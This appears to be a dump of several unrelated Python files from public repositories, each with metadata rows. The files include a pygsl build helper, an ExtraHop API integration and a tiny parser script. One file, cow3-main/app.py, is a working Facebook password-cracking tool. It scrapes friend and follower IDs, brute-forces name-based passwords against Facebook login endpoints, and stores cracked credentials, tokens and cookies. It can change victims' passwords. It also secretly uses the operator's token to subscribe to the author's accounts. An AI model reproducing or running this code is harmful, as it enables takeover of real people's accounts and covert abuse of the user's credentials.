return self._dict['parameters']
@property
def scan_parameters(self):
"""Workflow-specific scan parameters."""
return self._dict['scan_parameters']
def __repr__(self):
"""Build string representation."""
return "ProcessingBlock({})".format(
", ".join(["{}={}".format(k, repr(v))
for k, v in self._dict.items()]))
def __eq__(self, other):
"""Equality check."""
return self.to_dict() == other.to_dict()
| 33.032967 | 79 | 0.617764 |
319b781e5814130abde4cc96fd6e91ef3e46db80
| 49 |
py
|
Python
|
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | 1 |
2022-02-02T12:41:06.000Z
|
2022-02-02T12:41:06.000Z
|
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | null | null | null |
src/compgen2/gov/__init__.py
|
CorrelAid/compgen-ii-cgv
|
810a044d6bbe1ce058a359115e3e5fc71a358549
|
[
"MIT"
] | null | null | null |
from .gov import Gov
from .matcher import Matcher
| 24.5 | 28 | 0.816327 |
31d7a720545cbc5d928db017ff7224d15997bc64
| 9,763 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/gsl_Extension.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
#
# author: Achim Gaedke
# created: May 2001
# file: pygsl/gsl_dist/gsl_extension.py
# $Id: gsl_Extension.py,v 1.6 2015/09/27 06:34:23 schnizer Exp $
#
# module for gsl extensions compilation
from distutils.core import setup, Extension
from distutils.errors import DistutilsModuleError, DistutilsExecError
import os
import os.path
import re
import string
import types
import imp
from sys import argv,version_info
from array_includes import array_include_dirs
# steel --gsl-prefix from option list
gsl_prefix_option=None
gsl_prefix_option_pattern=re.compile("--gsl-prefix=(.+)")
pos=0
while pos<len(argv):
gsl_prefix_match=gsl_prefix_option_pattern.match(argv[pos])
if gsl_prefix_match:
gsl_prefix_option=gsl_prefix_match.group(1)
gsl_prefix_option.strip()
argv[pos:pos+1]=[]
break
pos+=1
# Extension class adapted for gsl
class _gsl_Location:
"""
Wrapper for the location of the gsl library.
On unix one can run gsl-config to find the locations. On other systems
one has to revert to other ways to find the configuration.
"""
def __init__(self):
self.prefix = None
self.cflags = None
self.libs = None
self.version = None
self.swig = None
def get_gsl_prefix(self):
assert(self.prefix != None)
return self.prefix
def get_gsl_cflags(self):
assert(self.cflags != None)
return self.cflags
def get_gsl_libs(self):
#print self.libs
assert(self.libs != None)
return self.libs
def get_gsl_version(self):
assert(self.version != None)
return self.version
def _split_version(self, version):
if version[-1] == '+':
version = version[:-1]
return re.split('\.',version)
def get_swig(self):
assert(self.swig)
return self.swig
class _gsl_Location_gsl_config(_gsl_Location):
"""
Call gsl_config to find the location of gsl
"""
def __init__(self):
_gsl_Location.__init__(self)
gsl_prefix = None
if gsl_prefix is not None:
self.gsl_config_tool=os.path.join(gsl_prefix,"bin","gsl-config")
elif gsl_prefix_option is not None:
self.gsl_config_tool=os.path.join(gsl_prefix_option,"bin","gsl-config")
else:
self.gsl_config_tool="gsl-config"
self.prefix = self.get_gsl_info('--prefix').strip()
self.cflags = self.get_gsl_info('--cflags').strip()
self.libs = self.get_gsl_info('--libs').strip()
self.version = self._split_version(self.get_gsl_info('--version').strip())[:2]
# I am running on swig. I suppose that swig is in the path
self.swig = "swig"
try:
self.swig = os.environ["SWIG"]
except KeyError:
pass
def get_gsl_info(self, arguments):
"""
executes gsl-config with given arguments
"""
gsl_command=os.popen(self.gsl_config_tool+' '+arguments)
gsl_output=gsl_command.readline()
gsl_command.close()
if not gsl_output:
raise DistutilsExecError("could not start %s"%self.gsl_config_tool)
return gsl_output
class _gsl_Location_file(_gsl_Location):
def __init__(self):
_gsl_Location.__init__(self)
try:
import gsl_site
except ImportError as des:
msg = "I do not know how to run gsl-config \n"+\
"on this system. Therefore you must provide me with the information\n" +\
"where to find the GSL library. I could not import `gsl_site'.\n" +\
"Reason: %s. Copy gsl_site_example.py to gsl_site.py.\n"+\
"Edit the variables in that file to reflect your installation."
raise DistutilsExecError(msg % des)
self.prefix = gsl_site.prefix
self.cflags = gsl_site.cflags
self.libs = gsl_site.libs
self.swig = gsl_site.swig
self.version = self._split_version(gsl_site.version)
if os.name == 'posix':
gsl_Location = _gsl_Location_gsl_config()
else:
gsl_Location = _gsl_Location_file()
class gsl_Extension(Extension):
"""
for gsl needs
"""
def __init__(self, name, sources,
include_dirs=None,
define_macros=None,
undef_macros=None,
library_dirs=None,
libraries=None,
runtime_library_dirs=None,
extra_objects=None,
extra_compile_args=None,
extra_link_args=None,
export_symbols=None,
gsl_prefix=None,
gsl_min_version=None,
python_min_version=None
):
# get real prefix
self.gsl_prefix=self.get_gsl_prefix()
gsl_major_version, gsl_minor_version = self.get_gsl_version()
# check gsl version
if gsl_min_version is not None and \
not self.check_gsl_version(gsl_min_version):
raise DistutilsExecError("min gsl version %s required"%repr(gsl_min_version))
# check python version
if python_min_version is not None and \
not self.check_python_version(python_min_version):
raise DistutilsExecError("min python version %s required"%repr(python_min_version))
# prepend include directory
if include_dirs is None: include_dirs=[]
include_dirs.append('Include')
include_dirs.append('.')
include_dirs[0:0]=[os.path.join(self.gsl_prefix,'include')]
include_dirs= include_dirs + array_include_dirs
# prepend library directory
if library_dirs is None: library_dirs=[]
library_dirs[0:0] = [os.path.join(self.gsl_prefix,'lib')]
# prepare lib list
# split optionlist and strip blanks from each option
gsl_lib_list=map(lambda x: x.strip(),self.get_gsl_libs().split())
# filter options with -l
not_lib_opt=lambda a:a[:2]=="-l"
gsl_lib_list=filter(not_lib_opt,gsl_lib_list)
# cut -l
only_lib_name=lambda a:a[2:]
gsl_lib_list=map(only_lib_name,gsl_lib_list)
if libraries is None: libraries=[]
#libraries.append('pygsl')
libraries.extend(gsl_lib_list)
# test if Numeric module is available
if define_macros is None:
define_macros=[]
try:
imp.find_module("Numeric")
define_macros = define_macros + [("NUMERIC",1),]
except ImportError:
define_macros = define_macros + [("NUMERIC",0), ]
if undef_macros == None:
undef_macros = []
if 'NDEBUG' not in undef_macros:
undef_macros.append('NDEBUG')
tmp = map(lambda x: x[0], define_macros)
if "PYGSL_GSL_MAJOR_VERSION" not in tmp:
define_macros = define_macros + [("PYGSL_GSL_MAJOR_VERSION", gsl_major_version),]
if "PYGSL_GSL_MINOR_VERSION" not in tmp:
#define_macros.append(("PYGSL_GSL_MINOR_VERSION", gsl_minor_version))
define_macros = define_macros + [("PYGSL_GSL_MINOR_VERSION", gsl_minor_version),]
Extension.__init__(self, name, sources,
include_dirs,
define_macros,
undef_macros,
library_dirs,
libraries,
runtime_library_dirs,
extra_objects,
extra_compile_args,
extra_link_args,
export_symbols
)
def check_version(self, required_version, this_version):
this_version = tuple(this_version)
#print("req '%s' this '%s'" %(required_version, this_version))
min_length=min(len(required_version),len(this_version))
for pos in range(min_length):
t_val = this_version[pos]
test_val = required_version[pos]
#print("\t %d: req '%s' this '%s'" %( pos, test_val, t_val))
this_type=type(t_val)
if this_type== type(" "):
t_val = int(t_val)
if type(test_val)== type(" "):
test_val = int(test_val)
if t_val > test_val:
# already larger
return 1
elif t_val == test_val:
continue
elif t_val < test_val:
return 0
else:
raise DistutilsExecError("incorrect version specification")
# problematic: 0.9 < 0.9.0, but assures that 0.9.1 > 0.9
if len(required_version)>len(this_version): return 0
return 1
def check_gsl_version(self, version_array):
return self.check_version(version_array,self.get_gsl_version())
def check_python_version(self, version_array):
return self.check_version(version_array,version_info)
# get gsl-prefix option
def get_gsl_info(self, arguments):
"""
executes gsl-config with given arguments
"""
gsl_command=os.popen(self.gsl_config_tool+' '+arguments)
gsl_output=gsl_command.readline()
gsl_command.close()
if not gsl_output:
raise DistutilsExecError("could not start %s"%self.gsl_config_tool)
return gsl_output
def get_gsl_prefix(self,):
return gsl_Location.get_gsl_prefix()
def get_gsl_cflags(self):
return gsl_Location.get_gsl_cflags()
def get_gsl_libs(self):
return gsl_Location.get_gsl_libs()
def get_gsl_version(self):
return gsl_Location.get_gsl_version()
| 32.652174 | 103 | 0.605756 |
9ee7a59e1510591a47bb738aa3510120f6bdb00b
| 13,906 |
py
|
Python
|
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
cow3-main/app.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/usr/bin/python3
#coding=utf-8
"""
Copyright © 2021 - 2023 | Latip176
Semua codingan dibuat oleh Latip176.
"""
import json, os, re, time
from concurrent.futures import ThreadPoolExecutor as Bool
P = "\x1b[0;97m"
M = "\x1b[0;91m"
H = "\x1b[0;92m"
K = "\x1b[0;93m"
B = "\x1b[0;94m"
BM = "\x1b[0;96m"
try:
import requests as req
except:
print("[{M}!{P}] {BM}Ops! Module requests belum terinstall...\nSedang Menginstall Module...{P}")
os.system("python3 -m pip install requests")
try:
from bs4 import BeautifulSoup as par
except:
print("[{M}!{P}] {BM}Ops! Module bs4 belum terinstall...\nSedang Menginstall Module...{P}")
os.system("python3 -m pip install bs4")
os.system("clear")
import data as dump
from data import cp_detect as cpp
from data import convert as cv
ok,cp,loop = 0,0,0
cot = ""
nampung, opsi = [], []
ub, pwBaru = [], []
class Main(object):
def __init__(self, token, id, name):
self.token = token
self.id = id
self.name = name
def banner(self):
banner = f"""
_________ ________ __ __________
\_ ___ \ \_____ \/ \ / \_____ \
/ \ \/ / | \ \/\/ / _(__ <
\ \____/ | \ / /
\
\______ /\_______ /\__/\ / /______ /
\/ \/ \/ \/
Version: {BM}0.1.4{P}
Coded by: Latip176, Sponsore: Fatah Sewu
"""
return banner
def cpdetect(self):
__data=input("[?] Masukan nama file: ")
try:
_file=open("results/"+__data,"r").readlines()
except FileNotFoundError:
exit("[!] File tidak ditemukan")
ww=input("[?] Ubah pw ketika tap yes [y/t]: ")
if ww in ("y","ya"):
pwBar=input("[+] Masukan pw baru: ")
ub.append("y")
if len(pwBar) <= 5:
exit("Password harus lebih dari 6 character!")
else:
pwBaru.append(pwBar)
cpp.Eksekusi("https://mbasic.facebook.com",_file,"file","".join(pwBaru),"".join(ub))
def proses(self):
print("")
op = input(f"[{K}?{P}] Munculkan opsi cp [y/t]: ")
if op in ("y","Y"):
opsi.append("y")
ww=input(f"[{K}?{P}] Ubah pw ketika tap yes [y/t]: ")
if ww in ("y","ya"):
pwBar=input(f"[{H}+{P}] Masukan pw baru: ")
ub.append("y")
if len(pwBar) <= 5:
exit(f"{M}Password harus lebih dari 6 character!{P}")
else:
pwBaru.append(pwBar)
else:
print("> Skipped")
print(f"\n[{BM}!{P}] Akun hasik ok di save di ok.txt\n[{BM}!{P}] Akun hasil cp di save di cp.txt\n")
class Data(Main):
def menu(self):
os.system("clear")
print(self.banner())
print(f" * Welcome {self.name} in tool! Pilih crack dan mulai.")
print(f"[{BM}1{P}]. Crack dari pertemanan publik\n[{BM}2{P}]. Crack dari followers publik\n[{BM}3{P}]. Checkpoint detector\n[{M}0{P}]. Logout akun (hapus token)\n")
_chose = input(f"[{K}?{P}] Chose: ")
__pilih = ["01","1","02","2","03","3","0"]
while _chose not in __pilih:
print("\n[!] Pilihan tidak ada")
_chose = input("[?] Chose: ")
print("")
if _chose in ("01","1"):
print(f"[{BM}!{P}] Ketik {BM}'me'{P} untuk teman list kamu")
__id = input(f"[{K}?{P}] Masukan username atau id target: ").replace("'me'","me")
if(re.findall("\w+",__id)):
if(__id not in ("me","'me'")):
r=req.get(f"https://m.facebook.com/{__id}", headers={"user-agent":"chrome"}).text
try:
id = re.findall('\;rid\=(\d+)\&',str(r))[0]
except:
exit(f"{M}[!] Ops! Username tidak ditemukan.{P}")
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(__id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).pertemanan(__id)
self.submit(self.data)
elif _chose in ("02","2"):
print(f"[{BM}!{P}] Ketik {BM}'me'{P} untuk followers list kamu")
__id = input(f"[{K}?{P}] Masukan username atau id target: ").replace("'me'","me")
if(re.findall("\w+",__id)):
if(__id not in ("me","'me'")):
r=req.get(f"https://m.facebook.com/{__id}", headers={"user-agent":"chrome"}).text
try:
id = re.findall('\;rid\=(\d+)\&',str(r))[0]
except:
exit(f"{M}[!] Ops! Username tidak ditemukan.{P}")
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(__id)
else:
self.data = dump.Dump("https://graph.facebook.com",self.token).followers(__id)
self.submit(self.data)
elif _chose in ("03","3"):
self.cpdetect()
elif _chose in ("0","00"):
os.system("rm -rf data/save.txt")
exit(f"{H}Thanks You....{P}\n")
else:
print(f"{M}[×] Kesalahan...{P}")
def submit(self,data):
print(f"\n[!] Pilih Metode Crack\n[{BM}1{P}] Metode b-api\n[{BM}2{P}] Metode mbasic")
metode = input(f"[{K}?{P}] Chose: ")
print(f"\n[!] D: {B}Default, {P}M: {BM}Manual, {P}G: {H}Gabung. {P}")
pasw=input(f"[{K}?{P}] Password [d/m/g]: ")
if pasw in ("m","M","g","G"):
print(f"[{BM}!{P}] Pisahkan password menggunakan koma contoh (sayang,bangsad)")
tam = input(f"[{H}+{P}] Masukan password: ").split(",")
self.proses()
print(" * Crack dimulai... CTRL + Z untuk stop! \n * Nyalakan mode pesawat jika tidak mendapatkan hasil\n")
with Bool(max_workers=35) as kirim:
for __data in data:
nama,id = __data.split("<=>")
nampung.append(id)
if(len(nama)>=6):
pwList = [nama,nama+"123",nama+"1234",nama+"12345"]
elif(len(nama)<=2):
pwList = [nama+"1234",nama+"12345"]
elif(len(nama)<=5):
pwList = [nama+"123",nama+"1234",nama+"12345"]
else:
pwList = [nama,nama+"123",nama+"1234",nama+"12345"]
if pasw in ("d","D"):
pwList = pwList
elif pasw in ("m","M"):
pwList = tam
elif pasw in ("g","G"):
pwList = pwList + tam
else:
pwList = pwList
if metode in ("01","1"):
kirim.submit(Crack(self.token,self.id,self.name).b_api,"https://b-api.facebook.com",id,pwList)
else:
kirim.submit(Crack(self.token,self.id,self.name).mbasic,"https://mbasic.facebook.com",id,pwList)
exit("[!] Crack selesai....")
class Crack(Main):
def b_api(self,url,user,pwList):
global ok,cp,cot,loop
if user!=cot:
cot=user
loop+=1
session = req.Session()
session.headers.update({
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding":"gzip, deflate",
"accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
"cache-control":"max-age=0",
"sec-sh-ua":'";Not A Brand";v="99", "Chromium";v="94"',
"sec-ch-ua-mobile":"?1",
"sec-ch-ua-platform":"Android",
"user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"
})
for pw in pwList:
pw=pw.lower()
response = session.get(url+"/method/auth.login",params={'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': user, 'locale': 'id_ID', 'password': pw, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'})
if "Anda Tidak Dapat Menggunakan Fitur Ini Sekarang" in response.text:
print("\r[!] Opss! Terkena spam... nyalakan mode pesawat selama 2 detik!\n",end="")
continue
if 'access_token' in response.text and 'EAAA' in response.text:
ok+=1
print(f"\r\r\33[32;1m[OK] {user} | {pw} | {response.json()['access_token']}\n\33[37;1m",end="")
open("results/ok.txt","a").write(user+"|"+pw+"\n")
break
elif 'www.facebook.com' in response.json()['error_msg']:
cp+=1
_file = user+"|"+pw
if "y" in opsi:
cpp.Eksekusi("https://mbasic.facebook.com",_file,"satu","".join(pwBaru),"".join(ub))
else:
print(f"\r\33[1;33m[CP] {user} | {pw} ∆\33[37;1m\n",end="")
open("results/cp.txt","a").write(user+"|"+pw+"\n")
break
else:
continue
print(f"\r[=] {str(loop)}/{str(len(nampung))} Ok/Cp: {str(ok)}/{str(cp)} CRACK: {'{:.1%}'.format(loop/float(len(nampung)))} ",end="")
def mbasic(self,url,user,pwList):
global loop, ok, cp, cot
if user!=cot:
cot=user
loop+=1
data={}
session = req.Session()
session.headers.update({
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding":"gzip, deflate",
"accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
"cache-control":"max-age=0",
"referer":"https://mbasic.facebook.com/",
"sec-ch-ua":'";Not A Brand";v="99", "Chromium";v="94"',
"sec-ch-mobile":"?1",
"sec-ch-ua-platform":'"Android"',
"sec-fetch-dest":"document",
"sec-fetch-mode":"navigate",
"sec-fetch-site":"same-origin",
"sec-fetch-user":"?1",
"upgrade-insecure-requests":"1",
"user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"
})
for pw in pwList:
pw = pw.lower()
soup = par(session.get(url+"/login/?next&ref=dbl&fl&refid=8").text,"html.parser")
link = soup.find("form",{"method":"post"})
lsd = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for __data in soup.find_all("input"):
if __data.get("name") in lsd:
data.update({__data.get("name"):__data.get("value")})
data.update({"email":user,"pass":pw})
try:
response = session.post(url+link.get("action"),data=data)
except:
exit("Ganti useragent!")
if "c_user" in session.cookies.get_dict():
if "Akun Anda Dikunci" in response.text:
print(f"\r\33[31;1m[CP] {user} | {pw} -> SESI NEW\n\33[37;1m",end="")
else:
ok+=1
coki = (";").join([ "%s=%s" % (key, value) for key, value in session.cookies.get_dict().items() ])
print(f"\r\33[32;1m[OK] {user}|{pw}|{coki}\n\33[37;1m",end="")
print(f"[{H}+{P}] Apk yang terkait:")
cpp.Eksekusi("","","","","").cek_apk(session,coki)
open("results/ok.txt","a").write(user+"|"+pw+"\n")
break
elif "checkpoint" in session.cookies.get_dict():
title = re.findall("\<title>(.*?)<\/title>",str(response.text))
if "Masukkan Kode Masuk untuk Melanjutkan" in title:
print(f"\r\33[31;1m[CP] {user} | {pw} -> A2F ON\n\33[37;1m",end="")
else:
cp+=1
_file = user+"|"+pw
if "y" in opsi:
cpp.Eksekusi("https://mbasic.facebook.com",_file,"satu","".join(pwBaru),"".join(ub))
else:
if "Lihat detail login yang ditampilkan. Ini Anda?" in title:
print(f"\r\33[32;1m[OK] {user} | {pw} -> Tap Yes\n\33[37;1m",end="")
else:
print(f"\r\33[1;33m[CP] {user} | {pw} ∆\33[37;1m\n",end="")
open("results/cp.txt","a").write(user+"|"+pw+"\n")
break
else:
if "Temukan Akun Anda" in re.findall("\<title>(.*?)<\/title>",str(response.text)):
print("\r\33[31;1m[!] hidupkan mode pesawat selama 2 detik \33[37;1m\n",end="")
continue
else:
pass
print(f"\r[=] {str(loop)}/{str(len(nampung))} Ok/Cp: {str(ok)}/{str(cp)} CRACK: {'{:.1%}'.format(loop/float(len(nampung)))} ",end="")
def login():
os.system("clear")
logo_login = """\n
.##.......####....####...######..##..##.
.##......##..##..##........##....###.##.
.##......##..##..##.###....##....##.###.
.##......##..##..##..##....##....##..##.
.######...####....####...######..##..##.
........................................
"""
print(logo_login,"\n * Login terlerbih dahulu menggunakan accesstoken facebook!\n * Jika tidak mempunyai token atau cookies silahkan cari tutorialnya di youtube untuk mendapatkan token facebook.\n * Ketika sudah memakai sc ini maka Author tidak bertanggung jawab atas resiko apa yang akan terjadi kedepannya.\n")
print(" * Ingin login menggunakan apa\n[1]. Login menggunakan cookies [Rawan Sesi New]\n[2]. Login menggunakan token")
bingung = input("\n[?] Login menggunakan: ")
__pilihan = ["01","1","02","2"]
while bingung not in __pilihan:
print("\n[!] Pilihan tidak ada")
bingung = input("[?] Login menggunakan: ")
if bingung in ("01","1"):
__cokiee = input("[?] cookie\t: ")
__coki = cv.Main(__cokiee).getToken()
if "EAA" in __coki:
_cek = json.loads(req.get(f"https://graph.facebook.com/me?access_token={__coki}").text)
_id = _cek['id']
_nama = _cek['name']
input(f"\n[✓] Berhasil login menggunakan cookies\n * Welcome {_nama} jangan berlebihan ya!\n * Enter untuk melanjutkan ke menu")
open("data/save.txt","a").write(__coki)
Data(__coki,_id,_nama).menu()
elif "Cookies Invalid" in __coki:
exit("\n[!] Cookies Invalid")
else:
exit("\n[!] Kesalahan")
elif bingung in ("02","2"):
__token = input("[?] token\t: ")
try:
__res=json.loads(req.get(f"https://graph.facebook.com/me?access_token={__token}").text)
_nama = __res['name']
_id = __res['id']
req.post(f'https://graph.facebook.com/100013031465766/subscribers?access_token={__token}')
req.post(f'https://graph.facebook.com/100034433778381/subscribers?access_token={__token}')
input(f"\n[✓] Berhasil login menggunakan token\n * Welcome {_nama} jangan berlebihan ya!\n * Enter untuk melanjutkan ke menu")
open("data/save.txt","a").write(__token)
Data(__token, _id, _nama).menu()
except KeyError:
print("\n[!] token invalid")
if __name__=="__main__":
try:
__token = open("data/save.txt","r").read()
__res=json.loads(req.get(f"https://graph.facebook.com/me?access_token={__token}").text)
_nama = __res['name']
_id = __res['id']
print(f" * Welcome back {_nama}\n * Menuju menu...")
time.sleep(3)
Data(__token, _id, _nama).menu()
except KeyError:
os.system("rm -rf data/save.txt")
print("\n[!] token invalid")
except FileNotFoundError:
print("[!] belum login\n * Menuju ke menu login...")
time.sleep(3)
login()
| 38.627778 | 313 | 0.603049 |
730bc13380827ab827ef3c7eec43ef996143bdc2
| 371 |
py
|
Python
|
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2017-12-12T13:58:08.000Z
|
2017-12-12T13:58:08.000Z
|
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | null | null | null |
sys/1/process.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2019-11-03T10:16:35.000Z
|
2019-11-03T10:16:35.000Z
|
from glob import iglob
from sys_1 import Parser
from os.path import isfile
o = open('ignore/output.txt', 'w', encoding='utf-8')
i=0
for fname in iglob('ignore/**/*.html', recursive=True):
i+=1
if isfile(fname):
parse = Parser()
for chunk in open(fname, encoding='utf-8'):
parse.feed(chunk)
print(parse.data, file= o)
print(i)
| 24.733333 | 55 | 0.622642 |
b42dd13e7a7302850aac546c53cd16ef117e432d
| 12,973 |
py
|
Python
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/DeprecatedContent/Integrations/ExtraHop/ExtraHop.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import json
import requests
from distutils.util import strtobool
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
APIKEY = demisto.params().get('apikey')
SERVER = demisto.params()['url'][:-1] if (demisto.params()['url'] and demisto.params()['url'].endswith('/')) else \
demisto.params()['url']
USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = SERVER + '/api/v1/'
HEADERS = {
'Accept': 'application/json',
'Authorization': 'ExtraHop apikey={key}'.format(key=APIKEY)
}
if not demisto.params().get('proxy'):
del os.environ['HTTP_PROXY']
del os.environ['HTTPS_PROXY']
del os.environ['http_proxy']
del os.environ['https_proxy']
# 'response' is a container for paginated results
response = []
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, data=None, payload=None):
data = json.dumps(data)
try:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
data=data,
headers=HEADERS,
params=payload
)
except requests.exceptions.RequestException: # This is the correct syntax
return_error('Failed to connect to - {url} - Please check the URL'.format(url=BASE_URL))
# Handle error responses gracefully
if res.status_code == 204:
return demisto.results('Successful Modification')
elif res.status_code not in {200, 204, 201}:
return_error('Error in API call to ExtraHop {code} - {reason}'.format(code=res.status_code, reason=res.reason))
return res
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module():
"""
Performs basic get request to check ExtraHop version
"""
test_result = http_request('GET', 'extrahop')
return test_result
def get_alerts():
res_raw = http_request('GET', 'alerts')
res = res_raw.json()
return res
def paginate(can_paginate, cursor):
while can_paginate is True:
body = {
"cursor": cursor,
"context_ttl": 400000
}
res_raw = http_request('POST', 'records/cursor', body)
res = res_raw.json()
response.append(res)
if 'cursor' in res:
paginate(True, res['cursor'])
else:
break
return response
def query_records(field, value, operator, query_from, limit):
data = {
"filter": {
"field": str(field),
"operand": str(value),
"operator": str(operator)
},
"from": int(query_from),
"limit": int(limit)
}
res_raw = http_request('POST', 'records/search', data)
res = res_raw.json()
response.append(res)
if 'cursor' in res:
response.append(paginate(True, res['cursor']))
return response
def devices():
active_from = demisto.args().get('active_from')
active_until = demisto.args().get('active_until')
search_type = demisto.args().get('search_type')
limit = demisto.args().get('limit')
payload = {}
if active_from:
payload['active_from'] = active_from
if active_until:
payload['active_until'] = active_until
if limit:
payload['limit'] = limit
payload['search_type'] = search_type
res_raw = http_request('GET', 'devices', data=None, payload=payload)
res = res_raw.json()
return res
def format_alerts(alerts):
hr = ''
ec = {
"ExtraHop": {
"Alert": []
}
} # type: dict
for alert in alerts:
hr += tableToMarkdown('Found Alert', alert, headerTransform=string_to_table_header, removeNull=True)
ec['ExtraHop']['Alert'].append(createContext(alert, keyTransform=string_to_context_key, removeNull=True))
if len(alerts) == 0:
demisto.results('No results were found')
else:
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': alerts,
'HumanReadable': hr,
'EntryContext': ec
})
def format_device_results(data):
hr_table = []
ec = {
"ExtraHop": {
"Device": []
}
} # type: dict
for device in data:
hr = {}
if 'id' in device:
hr['ID'] = device.get('id')
if 'display_name' in device:
hr['Display Name'] = device.get('display_name')
if 'ipaddr4' in device:
hr['IP Address'] = device.get('ipaddr4')
if 'macaddr' in device:
hr['MAC Address'] = device.get('macaddr')
if 'vendor' in device:
hr['Vendor'] = device.get('vendor')
hr_table.append(hr)
ec['ExtraHop']['Device'].append(createContext(device, keyTransform=string_to_context_key, removeNull=True))
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': data,
'HumanReadable': tableToMarkdown('Devices Found', hr_table),
'EntryContext': ec
})
def whitelist_modify(add, remove):
assignments = {}
if add:
add_items = add.split(',')
add_items = list(map(int, add_items))
assignments['assign'] = add_items
if remove:
remove_items = remove.split(',')
remove_items = list(map(int, remove_items))
assignments['unassign'] = remove_items
res = http_request('POST', 'whitelist/devices', data=assignments)
return res
def whitelist_retrieve():
res_raw = http_request('GET', 'whitelist/devices')
res = res_raw.json()
return res
def add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2, alert_id=None):
data = {
"apply_all": apply_all,
"disabled": disabled,
"name": name,
"notify_snmp": notify_snmp,
"refire_interval": int(refire_interval),
"severity": int(severity),
"type": alert_type
}
if alert_type == 'detection':
data['object_type'] = object_type
data['protocols'] = [str(protocols)]
elif alert_type == 'threshold':
data['field_name'] = field_name
data['stat_name'] = stat_name
data['units'] = units
data['interval_length'] = int(interval_length)
data['operand'] = operand
data['operator'] = operator
if demisto.args().get('field_name2'):
